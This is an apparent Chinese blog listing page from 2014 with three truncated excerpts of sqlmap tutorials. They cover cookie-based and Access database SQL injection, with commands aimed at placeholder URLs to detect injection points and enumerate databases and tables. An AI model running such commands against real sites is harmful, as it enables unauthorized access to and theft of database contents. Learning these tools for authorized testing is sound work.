摘要:
Cookie注入:1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.2.sqlmap命令提示符下输入下列内容进行跑表。 sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --... 阅读全文
posted @ 2014-11-22 21:30
技术宅星云
阅读(2703)
评论(0)
推荐(0)
摘要:
1.判断一个url是否存在注入点: .sqlmap.py -u "http://abcd****efg.asp?id=7" -dbs 假设找到数据库:student ------------------------------ available databases[1] [*] stud... 阅读全文
posted @ 2014-11-22 21:26
技术宅星云
阅读(538)
评论(0)
推荐(0)
摘要:
使用sqlmap工具进行Acces注入:1.判断一个url是否存在注入点,根据返回数据判断数据库类型: .sqlmap.py -u "http://abcd****efg.asp?id=7" 假设返回内容如下: ------------------------- [INFO] r... 阅读全文
posted @ 2014-11-22 21:22
技术宅星云
阅读(7596)
评论(0)
推荐(0)
浙公网安备 33010602011771号